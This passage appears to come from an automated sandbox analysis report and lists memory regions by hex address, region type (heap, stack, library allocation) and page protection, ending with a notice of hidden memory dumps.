||
|
2F29000
|
stack
|
page read and write
|
||
|
87C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
3390000
|
trusted library allocation
|
page read and write
|
||
|
1C45A4C6000
|
heap
|
page read and write
|
||
|
7D00000
|
trusted library allocation
|
page read and write
|
||
|
1C474420000
|
heap
|
page execute and read and write
|
||
|
5131000
|
heap
|
page read and write
|
||
|
1C45A455000
|
heap
|
page read and write
|
||
|
7C50000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC336000
|
trusted library allocation
|
page read and write
|
||
|
8E00000
|
direct allocation
|
page read and write
|
||
|
3370000
|
heap
|
page read and write
|
||
|
4C05000
|
heap
|
page read and write
|
||
|
3150000
|
heap
|
page read and write
|
||
|
7FFAAC500000
|
trusted library allocation
|
page read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
41B000
|
system
|
page execute and read and write
|
||
|
5320000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
375C000
|
heap
|
page read and write
|
||
|
4C01000
|
heap
|
page read and write
|
||
|
2CFD000
|
stack
|
page read and write
|
||
|
8740000
|
trusted library allocation
|
page read and write
|
||
|
4C1A000
|
heap
|
page read and write
|
||
|
512A000
|
heap
|
page read and write
|
||
|
7C60000
|
trusted library allocation
|
page execute and read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
877C000
|
heap
|
page read and write
|
||
|
7D5087F000
|
stack
|
page read and write
|
||
|
7FFAAC5F0000
|
trusted library allocation
|
page read and write
|
||
|
4C09000
|
heap
|
page read and write
|
||
|
343F000
|
heap
|
page read and write
|
||
|
5140000
|
heap
|
page read and write
|
||
|
2960000
|
heap
|
page readonly
|
||
|
8866000
|
heap
|
page read and write
|
||
|
17851D22000
|
heap
|
page read and write
|
||
|
876C000
|
heap
|
page read and write
|
||
|
8779000
|
heap
|
page read and write
|
||
|
2EEC000
|
stack
|
page read and write
|
||
|
1D923770000
|
heap
|
page read and write
|
||
|
1784FCEA000
|
heap
|
page read and write
|
||
|
7FFAAC283000
|
trusted library allocation
|
page execute and read and write
|
||
|
27BD000
|
stack
|
page read and write
|
||
|
2BDF000
|
stack
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
4C0D000
|
heap
|
page read and write
|
||
|
5521000
|
trusted library allocation
|
page read and write
|
||
|
8CDC000
|
stack
|
page read and write
|
||
|
5120000
|
heap
|
page read and write
|
||
|
4C0B000
|
heap
|
page read and write
|
||
|
8785000
|
heap
|
page read and write
|
||
|
7D10000
|
trusted library allocation
|
page read and write
|
||
|
29FE000
|
heap
|
page read and write
|
||
|
78C2000
|
heap
|
page read and write
|
||
|
7FFAAC550000
|
trusted library allocation
|
page read and write
|
||
|
43F8000
|
heap
|
page read and write
|
||
|
5160000
|
heap
|
page read and write
|
||
|
4C10000
|
heap
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
5298DFF000
|
unkown
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
8779000
|
heap
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
8DD0000
|
direct allocation
|
page read and write
|
||
|
7D8B000
|
stack
|
page read and write
|
||
|
1C474304000
|
heap
|
page read and write
|
||
|
7D5194D000
|
stack
|
page read and write
|
||
|
2DD0000
|
heap
|
page read and write
|
||
|
17851D11000
|
heap
|
page read and write
|
||
|
5546000
|
trusted library allocation
|
page read and write
|
||
|
1784FD08000
|
heap
|
page read and write
|
||
|
3350000
|
heap
|
page read and write
|
||
|
1C45A4EE000
|
heap
|
page read and write
|
||
|
5320000
|
trusted library allocation
|
page read and write
|
||
|
4DC1000
|
trusted library allocation
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
8781000
|
heap
|
page read and write
|
||
|
1784FCD4000
|
heap
|
page read and write
|
||
|
17851D18000
|
heap
|
page read and write
|
||
|
1784FC84000
|
heap
|
page read and write
|
||
|
3300000
|
heap
|
page read and write
|
||
|
29CE000
|
stack
|
page read and write
|
||
|
8759000
|
heap
|
page read and write
|
||
|
5186000
|
heap
|
page read and write
|
||
|
5186000
|
heap
|
page read and write
|
||
|
4C18000
|
heap
|
page read and write
|
||
|
512F000
|
heap
|
page read and write
|
||
|
2FA0000
|
heap
|
page readonly
|
||
|
1C474460000
|
heap
|
page read and write
|
||
|
7FFB22676000
|
unkown
|
page readonly
|
||
|
4C18000
|
heap
|
page read and write
|
||
|
1C45DDBA000
|
trusted library allocation
|
page read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
8757000
|
heap
|
page read and write
|
||
|
7FFAAC33C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C45A4A6000
|
heap
|
page read and write
|
||
|
7770000
|
heap
|
page read and write
|
||
|
5139000
|
heap
|
page read and write
|
||
|
5186000
|
heap
|
page read and write
|
||
|
4C18000
|
heap
|
page read and write
|
||
|
512C000
|
heap
|
page read and write
|
||
|
4C18000
|
heap
|
page read and write
|
||
|
1C45BE96000
|
trusted library allocation
|
page read and write
|
||
|
361D000
|
heap
|
page read and write
|
||
|
875C000
|
heap
|
page read and write
|
||
|
2E16000
|
stack
|
page read and write
|
||
|
55B9000
|
trusted library allocation
|
page read and write
|
||
|
4C18000
|
heap
|
page read and write
|
||
|
1C45A400000
|
trusted library allocation
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
1784FCDF000
|
heap
|
page read and write
|
||
|
4C09000
|
heap
|
page read and write
|
||
|
3610000
|
heap
|
page read and write
|
||
|
7410000
|
direct allocation
|
page read and write
|
||
|
4C18000
|
heap
|
page read and write
|
||
|
7BCE000
|
stack
|
page read and write
|
||
|
1784FC30000
|
heap
|
page read and write
|
||
|
8DC0000
|
trusted library allocation
|
page read and write
|
||
|
24FBF000
|
heap
|
page read and write
|
||
|
1C45D6CA000
|
trusted library allocation
|
page read and write
|
||
|
4C15000
|
heap
|
page read and write
|
||
|
1C45A590000
|
trusted library allocation
|
page read and write
|
||
|
1C46BE11000
|
trusted library allocation
|
page read and write
|
||
|
7CC0000
|
trusted library allocation
|
page read and write
|
||
|
78B9000
|
heap
|
page read and write
|
||
|
3260000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
1784FE88000
|
heap
|
page read and write
|
||
|
5186000
|
heap
|
page read and write
|
||
|
7FFAAC340000
|
trusted library allocation
|
page execute and read and write
|
||
|
5186000
|
heap
|
page read and write
|
||
|
4C18000
|
heap
|
page read and write
|
||
|
1D923790000
|
heap
|
page read and write
|
||
|
7FFAAC28D000
|
trusted library allocation
|
page execute and read and write
|
||
|
245A4000
|
heap
|
page read and write
|
||
|
2CDF000
|
stack
|
page read and write
|
||
|
17851A7E000
|
heap
|
page read and write
|
||
|
513F000
|
heap
|
page read and write
|
||
|
4C11000
|
heap
|
page read and write
|
||
|
79E1000
|
heap
|
page read and write
|
||
|
251B5000
|
heap
|
page read and write
|
||
|
4C15000
|
heap
|
page read and write
|
||
|
4C11000
|
heap
|
page read and write
|
||
|
5131000
|
heap
|
page read and write
|
||
|
8AC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
71FE000
|
stack
|
page read and write
|
||
|
1C4745F5000
|
heap
|
page read and write
|
||
|
7FFAAC480000
|
trusted library allocation
|
page read and write
|
||
|
24FC0000
|
heap
|
page read and write
|
||
|
4C15000
|
heap
|
page read and write
|
||
|
512D000
|
heap
|
page read and write
|
||
|
4C01000
|
heap
|
page read and write
|
||
|
7450000
|
direct allocation
|
page read and write
|
||
|
1784FCF8000
|
heap
|
page read and write
|
||
|
251B8000
|
heap
|
page read and write
|
||
|
4C10000
|
heap
|
page read and write
|
||
|
2A00000
|
heap
|
page read and write
|
||
|
701D1000
|
unkown
|
page execute read
|
||
|
72BE000
|
stack
|
page read and write
|
||
|
25144000
|
heap
|
page read and write
|
||
|
45D000
|
system
|
page execute and read and write
|
||
|
1784FE89000
|
heap
|
page read and write
|
||
|
5186000
|
heap
|
page read and write
|
||
|
7FFAAC3A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4C15000
|
heap
|
page read and write
|
||
|
1C45C5F2000
|
trusted library allocation
|
page read and write
|
||
|
5186000
|
heap
|
page read and write
|
||
|
4F1C000
|
trusted library allocation
|
page read and write
|
||
|
462F000
|
stack
|
page read and write
|
||
|
7C4D000
|
stack
|
page read and write
|
||
|
17851A6B000
|
heap
|
page read and write
|
||
|
4C0D000
|
heap
|
page read and write
|
||
|
5186000
|
heap
|
page read and write
|
||
|
2E1B000
|
stack
|
page read and write
|
||
|
1C45A660000
|
heap
|
page read and write
|
||
|
4971000
|
heap
|
page read and write
|
||
|
5186000
|
heap
|
page read and write
|
||
|
1C45A580000
|
heap
|
page read and write
|
||
|
17851A6A000
|
heap
|
page read and write
|
||
|
3753000
|
heap
|
page read and write
|
||
|
7FFB22676000
|
unkown
|
page readonly
|
||
|
2880000
|
heap
|
page read and write
|
||
|
9740000
|
direct allocation
|
page execute and read and write
|
||
|
356F000
|
stack
|
page read and write
|
||
|
7C0E000
|
stack
|
page read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
5021000
|
heap
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
1784FE89000
|
heap
|
page read and write
|
||
|
24FC4000
|
heap
|
page read and write
|
||
|
4C18000
|
heap
|
page read and write
|
||
|
1784FCEF000
|
heap
|
page read and write
|
||
|
5140000
|
heap
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
4C01000
|
heap
|
page read and write
|
||
|
256C7000
|
heap
|
page read and write
|
||
|
2E70000
|
heap
|
page read and write
|
||
|
17851D0E000
|
heap
|
page read and write
|
||
|
1C45A460000
|
heap
|
page read and write
|
||
|
5186000
|
heap
|
page read and write
|
||
|
7FFAAC450000
|
trusted library allocation
|
page execute and read and write
|
||
|
251BA000
|
heap
|
page read and write
|
||
|
1C47426A000
|
heap
|
page read and write
|
||
|
4C15000
|
heap
|
page read and write
|
||
|
8830000
|
trusted library allocation
|
page read and write
|
||
|
17914FE000
|
stack
|
page read and write
|
||
|
512C000
|
heap
|
page read and write
|
||
|
4C15000
|
heap
|
page read and write
|
||
|
358E000
|
stack
|
page read and write
|
||
|
17851A65000
|
heap
|
page read and write
|
||
|
1784FCC7000
|
heap
|
page read and write
|
||
|
A1DD000
|
direct allocation
|
page execute and read and write
|
||
|
5186000
|
heap
|
page read and write
|
||
|
1C45C636000
|
trusted library allocation
|
page read and write
|
||
|
8850000
|
trusted library allocation
|
page read and write
|
||
|
1C45C516000
|
trusted library allocation
|
page read and write
|
||
|
7D50E7E000
|
stack
|
page read and write
|
||
|
24FB1000
|
heap
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
251BD000
|
heap
|
page read and write
|
||
|
5186000
|
heap
|
page read and write
|
||
|
79A0000
|
heap
|
page execute and read and write
|
||
|
33A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC510000
|
trusted library allocation
|
page read and write
|
||
|
2FFD000
|
stack
|
page read and write
|
||
|
2839000
|
stack
|
page read and write
|
||
|
7FFB22661000
|
unkown
|
page execute read
|
||
|
8C1C000
|
stack
|
page read and write
|
||
|
701EF000
|
unkown
|
page readonly
|
||
|
5186000
|
heap
|
page read and write
|
||
|
4C0D000
|
heap
|
page read and write
|
||
|
7FFAAC5E0000
|
trusted library allocation
|
page read and write
|
||
|
2BA0000
|
heap
|
page read and write
|
||
|
8717000
|
stack
|
page read and write
|
||
|
327F000
|
stack
|
page read and write
|
||
|
2FE5000
|
heap
|
page read and write
|
||
|
2FC0000
|
heap
|
page read and write
|
||
|
34C5000
|
trusted library allocation
|
page execute and read and write
|
||
|
1784FCC7000
|
heap
|
page read and write
|
||
|
7FFAAC440000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C45A560000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC280000
|
trusted library allocation
|
page read and write
|
||
|
25BD5000
|
heap
|
page read and write
|
||
|
32F0000
|
heap
|
page read and write
|
||
|
8AA0000
|
trusted library allocation
|
page read and write
|
||
|
1784FC00000
|
heap
|
page read and write
|
||
|
7430000
|
direct allocation
|
page read and write
|
||
|
2DDD000
|
heap
|
page read and write
|
||
|
4C15000
|
heap
|
page read and write
|
||
|
502B000
|
heap
|
page read and write
|
||
|
24FB1000
|
heap
|
page read and write
|
||
|
4C15000
|
heap
|
page read and write
|
||
|
7440000
|
direct allocation
|
page read and write
|
||
|
877A000
|
heap
|
page read and write
|
||
|
5170000
|
heap
|
page read and write
|
||
|
7D503EE000
|
stack
|
page read and write
|
||
|
339D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1784FC90000
|
heap
|
page read and write
|
||
|
7400000
|
direct allocation
|
page read and write
|
||
|
33BA000
|
trusted library allocation
|
page execute and read and write
|
||
|
25144000
|
heap
|
page read and write
|
||
|
6E3E000
|
stack
|
page read and write
|
||
|
1784FE80000
|
heap
|
page read and write
|
||
|
514D000
|
heap
|
page read and write
|
||
|
1C45A430000
|
heap
|
page readonly
|
||
|
5186000
|
heap
|
page read and write
|
||
|
7D506FE000
|
stack
|
page read and write
|
||
|
881E000
|
stack
|
page read and write
|
||
|
5121000
|
heap
|
page read and write
|
||
|
2FE5000
|
heap
|
page read and write
|
||
|
2FE5000
|
heap
|
page read and write
|
||
|
2FE4000
|
heap
|
page read and write
|
||
|
7D20000
|
trusted library allocation
|
page read and write
|
||
|
34C2000
|
heap
|
page read and write
|
||
|
5128000
|
heap
|
page read and write
|
||
|
33B0000
|
trusted library allocation
|
page read and write
|
There are 853 hidden memdumps, click here to show them.